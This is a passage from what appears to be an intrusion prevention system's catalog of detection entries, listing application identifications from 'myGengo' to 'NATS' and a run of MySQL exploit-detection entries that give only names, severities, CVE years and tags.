Last changed: sgpkg-ips-1678-5242
Description: FreshPoint is fresh produce distributor.
Back to top

myGengo

About this situation: Application myGengo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gengo is a translation platform that enables to read and publish across languages.
Back to top

Mygreenpc

About this situation: MyGreenPC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to remote access your computer from anywhere in the world.
Back to top

Myheritage

About this situation: MyHeritage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Myleavedays.com

About this situation: Application Myleavedays.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Myleavedays.com is a leave management system for recording, compulsory leave days, public holidays, ADV days, overtime, sick leave, age-related days off, jubilee anniversaries.
Back to top

myLexia

About this situation: Application myLexia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lexia Learning Systems provides reading software. It offers Lexia Reading, educational software that helps students to learn reading and increase academic performance in elementary, middle, and secondary schools, pre-school and day care centers, special education programs, home schools, correctional institutions, adult learning centers, and second language centers worldwide.
Back to top

MyLiveChat

About this situation: Application MyLiveChat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Live Chat is used as a small business live chat solution, an enterprise chat application, a live help service and as a visitor monitoring, cobrowsing and conversion rate optimization software tool by business clients, academic institutions and non-profit organizations.
Back to top

MyMillennium-Community

About this situation: Application MyMillennium-Community detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Millennium S.I. was founded to provide the beauty and wellness industries with forward-thinking, powerful management software and vital tools.
Back to top

myMusic

About this situation: myMusic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-664-5211
Description: myMusic, formerly known as ezPeer, is an online music service provided by Taiwan Kuro Times Co., Ltd, where users can access audio and video music posted by Kuro Times. myMusic is available as desktop application, web application and mobile apps
Back to top

MyMusicCloud

About this situation: Application MyMusicCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyMusicCloud, a cloud based music service, allows you to enjoy music regardless of your choice of mobile device. With synchronization and streaming options you can listen to your music on your computer, mobile and tablet device online or offline.
Back to top

Mynimo

About this situation: Application Mynimo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mynimo is dedicated to providing jobseekers and employers with effective and user-friendly solutions for their job search and recruitment needs.
Back to top

Myob

About this situation: myob usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: MYOB Essentials is easy online accounting software that has everything you need to take care of business, including payroll. MYOB Essentials is the fast and easy way to manage your cash flow and ATO compliance requirements. Includes time saving features help take care of the day-to-day bookwork.
Back to top

myosh

About this situation: Application myosh detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: myosh is a vendor of environmental health and safety management cloud based software. It offers dashboards and mobile apps servicing the requirements of industries including government, defense, aviation, manufacturing, construction and mining.
Back to top

MyPCBackup

About this situation: Application MyPCBackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyPCBackup is an online data backup service with mobile features including supercharged backups, sync folder space up to 20GB, hourly backups, recycle bin protection etc.
Back to top

Myphotoalbum

About this situation: MyPhotoAlbum usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

MyRecruitment-Plus-Platform

About this situation: Application MyRecruitment-Plus-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: adlogic is a Sydney, Australia-based recruitment software company.
Back to top

mySetu-EHSandS

About this situation: Application mySetu-EHSandS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EHS process is a repository suite that highlights relationships between various business areas.
Back to top

MySpace

About this situation: MySpace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-595-5211
Description: MySpace is a social networking website focusing on entertainment by connecting users to multimedia content, games and celebrities.
Back to top

MySpecwriter

About this situation: Application MySpecwriter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Construction specification hosting for the entire design, construction and facilities managementvcommunity.
Back to top

MySQL

About this situation: MySQL traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-759-5211
Description: MySQL is an open source relational database management system.
Back to top

MySQL_Create-Function-Command-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the CREATE FUNCTION command in MySQL
Context: TCP MySQL Client Stream
Severity: 2
Tags: Unix, Any Hardware, MySQL, CVE2005, Unix not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-179-2032
Vulnerability: MySQL-Create-Function-Command-Buffer-Overflow
Description:
Back to top

MySQL_CS-Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control

About this situation: An attempt to exploit a vulnerability in Dell OpenManage Network Manager detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dell OpenManage, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control
Description:
Back to top

MySQL_CS-MySQL-Login-Handshake-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: MySQL-Login-Handshake-Information-Disclosure
Description:
Back to top

MySQL_CS-MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MySQL detected
Context: TCP MySQL Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service
Description:
Back to top

MySQL_CS-Oracle-MySQL-Delete-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: Oracle-MySQL-Delete-Heap-Buffer-Overflow
Description:
Back to top

MySQL_CS-Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-496-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow
Description:
Back to top

MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service
Description:
Back to top

MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2013, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow
Description:
Back to top

MySQL_CS-Oracle-Mysql-Server-Xpath-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1866-5242
Vulnerability: Oracle-Mysql-Server-Xpath-Denial-Of-Service
Description:
Back to top

MySQL_Mysql-Authentication-BOF

About this situation: An attempt to exploit a vulnerability in MySQL AB MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: MySQL-Authentication-Bypass
Description:
Back to top

MySQL_MySQL-Authentication-Bypass

About this situation: Attempt to bypass MySQL authentication
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MySQL-Authentication-Bypass
Description:
Back to top

MySQL_Mysql-Authentication-Bypass-2

About this situation: An attempt to exploit a vulnerability in MySQL AB MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-454-4333
Vulnerability: MySQL-Authentication-Bypass
Description:
Back to top

MySQL_MySQL-Msdos-Device-Name-DoS

About this situation: Attempt to cause a denial service on MySQL database server
Context: TCP MySQL Client Stream
Severity: 2
Tags: Windows, Any Hardware, MySQL, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MySQL-Msdos-Device-Name-DoS
Description:
Back to top

MySQL_MySQL-Server-Create-Function-Arbitrary-Code-Execution

About this situation: Attempt to execute arbitrary code via MySQL CREATE FUNCTION
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-179-2032
Vulnerability: MySQL-Server-Create-Function-Arbitrary-Code-Execution
Description:
Back to top

MySQL_MySQL-Server-Date-Format-Function-Format-String

About this situation: Detects denial of service exploits via the DATE_FORMAT function against MySQL
Context: TCP MySQL Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: MySQL-MySQL-Server-Date-Format-Function-Format-String
Description:
Back to top

MySQL_MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability

About this situation: Attempt to load an arbitrary library via MySQL mysql.func table
Context: TCP MySQL Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, MySQL, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-179-2032
Vulnerability: MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability
Description:
Back to top

MySQL_MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow

About this situation: Detects buffer overflow exploits via the SSL Client Hello message against MySQL
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-668-5211
Vulnerability: MySQL-MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow
Description:
Back to top

MySQL_Oracle-MySQL-Authentication-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Server detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: Oracle-MySQL-Authentication-Integer-Overflow
Description:
Back to top

MySQL_Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow
Description:
Back to top

MySQL_Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service
Description:
Back to top

MySQL_Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service

About this situation: This is the published proof of concept attack against MySQL using joins involving an unique SET column.
Context: TCP MySQL Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service
Description:
Back to top

MySQL_Oracle-MySQL-Drop-Table

About this situation: A DROP TABLE command was detected
Context: TCP MySQL Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Oracle-MySQL-Drop-Table
Description:
Back to top

MySQL_Oracle-MySQL-Dumpfile-DLL-Upload

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, MySQL, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Oracle-MySQL-Payload-Execution
Description:
Back to top

MySQL_Oracle-MySQL-Sys-Exec

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, MySQL, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Oracle-MySQL-Payload-Execution
Description:
Back to top

MySQL_SS-Failed-Login

About this situation: Failed MySQL login
Context: TCP MySQL Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: MySQL-Failed-Login
Description:
Back to top

MySQL_SS-Oracle-Mysql-Client-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL Client detected
Context: TCP MySQL Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Client, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Oracle-Mysql-Client-Heap-Buffer-Overflow
Description:
Back to top

MySQL_SS-Server-Version-4.1

About this situation: MySQL server version 4.1 was detected
Context: TCP MySQL Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Description:
Back to top

MySQL_Sun-Mysql-Database-Select-Subquery-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Sun Microsystems MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-375-4219
Vulnerability: Sun-Mysql-Database-Select-Subquery-Denial-Of-Service
Description:
Back to top

MySQL_Sun-MySQL-mysql-log-Format-String-Vulnerability

About this situation: Detects a format string exploit against MySQL
Context: TCP MySQL Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-415-4219
Vulnerability: MySQL-Sun-MySQL-mysql_log-Format-String-Vulnerability
Description:
Back to top

MySQL_TableDump-Function-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in MySQL AB MySQL detected
Context: TCP MySQL Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Mysql-Com_Table_Dump-Function-Stack-Overflow
Description:
Back to top

MySSLProxy

About this situation: MySSLProxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: MySSLProxy is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

myStaffingPro

About this situation: Application myStaffingPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: myStaffingPro is a web-based applicant tracking system
Back to top

MyStrategicPlan

About this situation: Application MyStrategicPlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnStrategy - strategic planning and performance management. Cloud-based software and hands-on services closes the gap between strategy and execution.
Back to top

Mysurveylab

About this situation: mySurveyLab usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: mySurveyLab is online survey tool that enables easy survey creation, automates response collection and provides real-time reports.
Back to top

myTNT

About this situation: Application myTNT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TNT Express N.V. is an international courier delivery services company. The firm has fully owned operations in 63 countries and delivers documents, parcels and pieces of freight to over 200 countries.
Back to top

MyVault

About this situation: Application MyVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Vault is designed for the secure storage of select important private documents for future retrieval. Provides a set of pre-named folders and sub-folders.
Back to top

myVdrive

About this situation: Application myVdrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: myVdrive provides file sharing and hosting service with unlimited file storage.
Back to top

Myyearbook

About this situation: myYearbook usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Mzinga

About this situation: Application Mzinga detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mzinga is the platform that helps making social work with customers, partners, and employees.
Back to top

N-able Take Control

About this situation: N-able Take Control usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Description: N-able Take Control is a remote-control and support tool. This application can be only used for detection for identification purposes. The application detects some of the connections that the application uses.
Back to top

N-central

About this situation: Application N-central detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: N-able's N-Central is a complete platform for delivering IT services remotely across multiple networks and sites, for the least cost of delivery.
Back to top

NABD

About this situation: Application NABD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NABD is cloud based customer service support and case management system across all channels including web, call center, email, and social media. The first solution with integrated BPM engine and collaborative communication platform. NABD is enhancing customer experience by providing a unified view of customer cases across all channels.NABD guides your front and back office agents through the successful resolution path in the shortest timeframe and presents to your agents the next best action. It is a generic customer service support solution for all industries and it can be adapted to industry-specific needs.
Back to top

NACUBO:-Home

About this situation: Application NACUBO:-Home detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The National Association of College and University Business Officers
Back to top

NADA-guides

About this situation: Application NADA-guides detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NADA guides is a mobile apps developing company which develops apps and softwares for iPhone.
Back to top

Nagios

About this situation: Application Nagios detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nagios is an open source computer system monitoring, network monitoring and infrastructure monitoring software application.
Back to top

Nakisa

About this situation: Application Nakisa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nakisa - enterprise business solutions for HCM and Finance. Available on premise and in the cloud.
Back to top

Name

About this situation: Application Name detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Name is a service that offers web domains, websites, web hosting for support the customer.
Back to top

NameCheap

About this situation: Application NameCheap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Namecheap is an ICANN-accredited domain registrar and web hosting company.
Back to top

NameJet

About this situation: Application NameJet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NameJet is a domain name auction company with an inventory of expired and deleted domains from domain name registrars.
Back to top

Namely

About this situation: Application Namely detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Namely is a cloud-based people management platform enabling companies to manage teams, retain top performers, and optimize performance.
Back to top

NameSilo

About this situation: Application NameSilo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NameSilo is a domain registration company.
Back to top

NamesPro

About this situation: Application NamesPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NamesPro provides domain services to users.
Back to top

Nanigans

About this situation: Nanigans usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-595-5211
Description: Nanigans is an online statistics and analytics service.
Back to top

nanoRep

About this situation: Application nanoRep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: nanoRep is a self-service digital engagement platform that maximizes conversions and reduces support load by automatically providing a personalized actionable answer for every question.
Back to top

Napster

About this situation: Application Napster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Napster lets you to stream music online, download songs and listen offline, and play personalized radio stations.
Back to top

Narrable

About this situation: Application Narrable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Narrable is an online storytelling platform for combining your most important photos with the voices that give them life.
Back to top

Nasuni

About this situation: Application Nasuni detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nasuni provides cloud-integrated storage for the global enterprise combining on-premise hardware with cloud storage.
Back to top

NAT-T

About this situation: NAT-T traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1280-5242
Description: IPsec NAT traversal traffic detected.
Back to top

Nate-Video

About this situation: Nate Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-628-5211
Description: Nate Video is a Korean website which provides online video streaming service.
Back to top

Nateon

About this situation: NateOn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application is popular in South Korea.
Back to top

National-Australia-Bank

About this situation: Application National-Australia-Bank detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: National Australia Bank provides banking financial solutions include internet banking, accounts, insurance, credit cards, home loans and personal loans.
Back to top

National-Positions

About this situation: Application National-Positions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: National Positions is a search engine optimization
Back to top

NativeX

About this situation: Application NativeX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NativeX is ad technology for mobile games and is re-inventing in-app advertising with beautiful native ad experiences.
Back to top

NATS

About this situation: NATS usage detected
Context: Application Context
Severity: 1
